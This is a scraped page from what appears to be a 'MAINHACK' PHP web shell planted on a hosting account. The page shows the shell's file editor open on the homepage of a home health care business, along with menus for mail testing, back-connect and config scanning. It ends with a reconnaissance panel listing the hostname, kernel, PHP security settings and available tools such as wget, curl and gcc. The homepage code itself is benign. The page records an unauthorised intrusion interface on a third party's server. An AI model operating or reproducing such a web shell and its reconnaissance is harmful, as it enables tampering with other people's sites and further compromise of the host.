[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: index.php
<?php include("header.php"); ?> <!-- // Header include --> <!-- Banner Start --> <div class="banner"> <!-- <video playsinline="playsinline" muted="muted" preload="auto" autoplay="autoplay" loop="loop" data-setup=""> <source src="videos/banner-video.mp4" type="video/mp4"> </video> <div class="banner-text"> <div class="container"> <div class="text-dec"> <h2>Phenix HR <span>Human Resources Consultancy</span></h2> <p>Phenix HR Human Resources Consultancy has redefined the process of global recruitment to a predictably accurate process with defined parameters for matching job skills of potential candidates with the job profiles of various companies. </p> <a href="about.php" class="active">Read more</a> <a href="contact.php">Contact Us</a> </div> </div> </div> --> <div id="banner-slider" class="owl-carousel"> <?php $count=1; $sr='top_slider'; $stmt =$show->readAll($sr); $num = $stmt->rowCount(); if($num>0){ while ($row = $stmt->fetch(PDO::FETCH_ASSOC)){ extract($row); $id=$row['id']; ?> <div class="item"> <img src="<?=$pic_img?>/<?=$row['image']?>" /> </div> <?php } } ?> <!--- <div class="item"> <img src="images/banner-3.png" /> </div> <div class="item"> <img src="images/banner-4.png" /> </div> --> </div> </div> <!-- Banner End --> <!-- About Start --> <div class="about"> <div class="container"> <div class="col-md-7 col-sm-7 col-xs-12"> <h2>About <span>Us</span></h2> <p><b>HOME TEAM</b> has evolved into a dynamic force in the home health care sector. Our journey has been marked by a commitment to excellence, a deep-rooted passion for caregiving, and an unyielding dedication to the well-being of our clients. Our remarkable growth is a testament to the trust our clients place in us and the transformative impact we've had on their lives. For the past five years, <b>HOME TEAM</b> has been a beacon of excellence in the home health care industry. Our journey, though relatively young, has been characterized by a fervent dedication to the well-being of our clients and a tireless pursuit of professional growth. Our rapid rise is a testament to the quality of care we provide and the trust we have earned from our clients and their families.</p> <a href="about.php" class="about-btn">Read More</a> </div> <div class="col-md-5 col-sm-5 col-xs-12"> <div class="about-image"> <img src="images/about-2.png" alt=""> </div> </div> </div> </div> <!-- Service Start --> <div class="service-1st"> <div class="container"> <!-- <h2>Our <span>Services</span></h2> --> <h3>Live-in Services (24 Hrs) – Service throughout India</h3> <div id="service-slider" class="owl-carousel"> <?php $count=1; $sr='service'; $stmt =$show->readwithdata($sr,'category','Live-in Services (24 Hrs)'); $num = $stmt->rowCount(); if($num>0){ $count=1; while ($row = $stmt->fetch(PDO::FETCH_ASSOC)){ extract($row); $id=$row['id']; ?> <div class="item"> <div class="service-box-content"> <a href="live-service.php"> <img src="<?=$pic_img?>/<?=$row['image']?>" /> <h4><?=$row['title']?></h4> </a> </div> </div> <?php } } ?> <!---- <div class="item"> <div class="service-box-content"> <a href="live-service.php"> <img src="images/service-2.png" /> <h4>Nanny & Babysitter Services</h4> </a> </div> </div> <div class="item"> <div class="service-box-content"> <a href="live-service.php"> <img src="images/service-3.png" /> <h4>Home Nursing Care Services</h4> </a> </div> </div> <div class="item"> <div class="service-box-content"> <a href="live-service.php"> <img src="images/service-4.png" /> <h4>Patient Care Assistant (PCA) Services</h4> </a> </div> </div> <div class="item"> <div class="service-box-content"> <a href="live-service.php"> <img src="images/service-5.png" /> <h4>Elderly Care Assistant (ECA) Services</h4> </a> </div> </div> <div class="item"> <div class="service-box-content"> <a href="live-service.php"> <img src="images/service-6.png" /> <h4>Specialized Medical Care Services</h4> </a> </div> </div> <div class="item"> <div class="service-box-content"> <a href="live-service.php"> <img src="images/service-7.png" /> <h4>Tailored Medical Care Services</h4> </a> </div> </div> <div class="item"> <div class="service-box-content"> <a href="live-service.php"> <img src="images/service-8.png" /> <h4>Ward Boy Services</h4> </a> </div> </div> <div class="item"> <div class="service-box-content"> <a href="live-service.php"> <img src="images/service-9.png" /> <h4>Office Boy Services (Standard working hours)</h4> </a> </div> </div> <div class="item"> <div class="service-box-content"> <a href="live-service.php"> <img src="images/service-10.png" /> <h4>Domestic Help Services</h4> </a> </div> </div> --> </div> </div> </div> <!-- Ads Start --> <div class="ads"> <div class="container"> <div id="ads-slider" class="owl-carousel"> <div class="item"> <img src="images/home-team-ads-1.png"> </div> <div class="item"> <img src="images/home-team-ads-2.png"> </div> </div> </div> </div> <!-- Service Start --> <div class="service-1st"> <div class="container"> <h3>Part-time / Full-time Services (Limited Pincodes in Kolkata only)</h3> <div id="service-slider-2" class="owl-carousel"> <?php $count=1; $sr='service'; $stmt =$show->readwithdata($sr,'category','Part-time / Full-time Services'); $num = $stmt->rowCount(); if($num>0){ $count=1; while ($row = $stmt->fetch(PDO::FETCH_ASSOC)){ extract($row); $id=$row['id']; ?> <div class="item"> <div class="service-box-content"> <a href="partime-service.php"> <img src="<?=$pic_img?>/<?=$row['image']?>" /> <h4><?=$row['title']?></h4> </a> </div> </div> <?php } } ?> <!--- <div class="item"> <div class="service-box-content"> <a href="partime-service.php"> <img src="images/service-3.png" /> <h4>Home Nursing Care Services</h4> </a> </div> </div> <div class="item"> <div class="service-box-content"> <a href="partime-service.php"> <img src="images/service-4.png" /> <h4>Patient Care Assistant (PCA) Services</h4> </a> </div> </div> <div class="item"> <div class="service-box-content"> <a href="partime-service.php"> <img src="images/service-5.png" /> <h4>Elderly Care Assistant (ECA) Services</h4> </a> </div> </div> <div class="item"> <div class="service-box-content"> <a href="partime-service.php"> <img src="images/service-6.png" /> <h4>Specialized Medical Care Services</h4> </a> </div> </div> <div class="item"> <div class="service-box-content"> <a href="partime-service.php"> <img src="images/service-7.png" /> <h4>Tailored Medical Care Services</h4> </a> </div> </div> <div class="item"> <div class="service-box-content"> <a href="partime-service.php"> <img src="images/service-8.png" /> <h4>Ward Boy Services</h4> </a> </div> </div> <div class="item"> <div class="service-box-content"> <a href="partime-service.php"> <img src="images/service-9.png" /> <h4>Office Boy Services (Standard working hours)</h4> </a> </div> </div> <div class="item"> <div class="service-box-content"> <a href="partime-service.php"> <img src="images/service-10.png" /> <h4>Domestic Help Services</h4> </a> </div> </div> --> </div> </div> </div> <!-- Photo Gallery Start --> <div class="photo-gallery-block"> <div class="container"> <h2>Photo <span>Gallery</span></h2> <div id="photo-slider" class="owl-carousel"> <?php $count=1; $sr='gallery'; $stmt =$show->readwithdata($sr,'type','GALLERY'); $num = $stmt->rowCount(); if($num>0){ while ($row = $stmt->fetch(PDO::FETCH_ASSOC)){ extract($row); $id=$row['id']; ?> <div class="item"> <div class="gallery-box"> <a href="<?=$pic_img?>/<?=$row['images']?>" data-lightbox="example-set" data-title=""> <img src="<?=$pic_img?>/<?=$row['images']?>" class="pho-gall"/> <div class="view-caption"> <p>Quick View</p> </div> </a> </div> </div> <?php } } ?> <!--- <div class="item"> <div class="gallery-box"> <a href="images/gallery-2.png" data-lightbox="example-set" data-title=""> <img src="images/gallery-2.png" class="pho-gall"/> <div class="view-caption"> <p>Quick View</p> </div> </a> </div> </div> <div class="item"> <div class="gallery-box"> <a href="images/gallery-3.png" data-lightbox="example-set" data-title=""> <img src="images/gallery-3.png" class="pho-gall"/> <div class="view-caption"> <p>Quick View</p> </div> </a> </div> </div> <div class="item"> <div class="gallery-box"> <a href="images/gallery-4.png" data-lightbox="example-set" data-title=""> <img src="images/gallery-4.png" class="pho-gall"/> <div class="view-caption"> <p>Quick View</p> </div> </a> </div> </div> <div class="item"> <div class="gallery-box"> <a href="images/gallery-5.png" data-lightbox="example-set" data-title=""> <img src="images/gallery-5.png" class="pho-gall"/> <div class="view-caption"> <p>Quick View</p> </div> </a> </div> </div> <div class="item"> <div class="gallery-box"> <a href="images/gallery-6.png" data-lightbox="example-set" data-title=""> <img src="images/gallery-6.png" class="pho-gall"/> <div class="view-caption"> <p>Quick View</p> </div> </a> </div> </div> <div class="item"> <div class="gallery-box"> <a href="images/gallery-7.png" data-lightbox="example-set" data-title=""> <img src="images/gallery-7.png" class="pho-gall"/> <div class="view-caption"> <p>Quick View</p> </div> </a> </div> </div> <div class="item"> <div class="gallery-box"> <a href="images/gallery-8.png" data-lightbox="example-set" data-title=""> <img src="images/gallery-8.png" class="pho-gall"/> <div class="view-caption"> <p>Quick View</p> </div> </a> </div> </div> <div class="item"> <div class="gallery-box"> <a href="images/gallery-9.png" data-lightbox="example-set" data-title=""> <img src="images/gallery-9.png" class="pho-gall"/> <div class="view-caption"> <p>Quick View</p> </div> </a> </div> </div> <div class="item"> <div class="gallery-box"> <a href="images/gallery-10.png" data-lightbox="example-set" data-title=""> <img src="images/gallery-10.png" class="pho-gall"/> <div class="view-caption"> <p>Quick View</p> </div> </a> </div> </div> --> </div> </div> </div> <!-- Quote --> <div class="quote"> <div class="container"> <p>" Nurses truly are a blessing in disguise. They provide support and love to those who need it the most, are selfless and kind, have an enormous heart, and are strong-willed individuals who put others before themselves. "</p> </div> </div> <!-- Video Gallery --> <div class="video-gallery"> <div class="container"> <h2>Video <span>Gallery</span></h2> <div id="video-slider" class="owl-carousel"> <?php $count=1; $sr='video'; $stmt =$show->readAll($sr); $num = $stmt->rowCount(); if($num>0){ while ($row = $stmt->fetch(PDO::FETCH_ASSOC)){ extract($row); $id=$row['id']; ?> <div class="item"> <div class="video-gallery-block"> <iframe width="560" height="315" src="https://www.youtube.com/embed/<?=$row['url']?>" title="YouTube video player" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" allowfullscreen></iframe> </div> </div> <?php } } ?> </div> </div> </div> <!-- Ads Start --> <!-- <div class="ads"> <div class="container"> <div id="ads-2-slider" class="owl-carousel"> <div class="item"> <img src="images/ads-22.png"> </div> <div class="item"> <img src="images/ads-33.png"> </div> </div> </div> </div> --> <!-- Testimonial Start --> <div class="testimonial"> <div class="container"> <h2>Client <span>Testimonial</span></h2> <div id="testimonial-slider" class="owl-carousel"> <?php $count=1; $sr='testimonial'; $stmt =$show->readAll($sr); $num = $stmt->rowCount(); if($num>0){ $count=1; while ($row = $stmt->fetch(PDO::FETCH_ASSOC)){ extract($row); $id=$row['id']; ?> <div class="item"> <div class="testimonial-box-content"> <div class="testimonial-img-block"> <!-- <img src="images/testi-img-1.png"> --> <img src="<?=$pic_img?>/<?=$row['description']?>"> </div> <!-- <div class="testimonial-dec-block"> <h4>- Raj Roy</h4> <p>It is a long established fact that a reader will be distracted by the readable content of a page when looking at its layout. The point of using Lorem Ipsum is that it has a more-or-less normal distribution of letters, as opposed to using 'Content here, content here', making it look like readable English.</p> <img src="images/5.png" class="rating"> </div> --> </div> </div> <?php } } ?> </div> <div class="testi-btn"> <a href="#" class="why-btn">See More</a> </div> </div> </div> <!-- Why Choose HOME TEAM? --> <div class="why-block"> <div class="container"> <h2>Why <span>Choose Us ?</span></h2> <div class="why-block-box"> <img src="images/why-icon-1.png"> <h4><i>Highly Trained Professionals</i></h4> </div> <div class="why-block-box"> <img src="images/why-icon-2.png"> <h4><i>Value To Money</i></h4> </div> <div class="why-block-box"> <img src="images/why-icon-3.png"> <h4><i>Dedicated Support Desk</i></h4> </div> <div class="why-block-box"> <img src="images/why-icon-4.png"> <h4><i>Empathy and Compassion</i></h4> </div> <div class="why-block-box"> <img src="images/why-icon-5.png"> <h4><i>Caregiver Support</i></h4> </div> <a href="why.php" class="why-btn">View More</a> </div> </div> </div> <!-- Footer include --> <?php include("footer.php"); ?> <!-- // Footer include -->
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server05.hostinghome.co.in
Server IP: 192.168.74.40
PHP Version: 7.4.33
Server Software: Apache
System: Linux server05.hostinghome.co.in 3.10.0-962.3.2.lve1.5.81.el7.x86_64 #1 SMP Wed May 31 10:36:47 UTC 2023 x86_64
HDD Total: 1.95 TB
HDD Free: 677.58 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Disabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes
gcc:
Yes
pkexec:
No
git:
Yes
User Info
Username: itsweb
User ID (UID): 1619
Group ID (GID): 1621
Script Owner UID: 1619
Current Dir Owner: 1619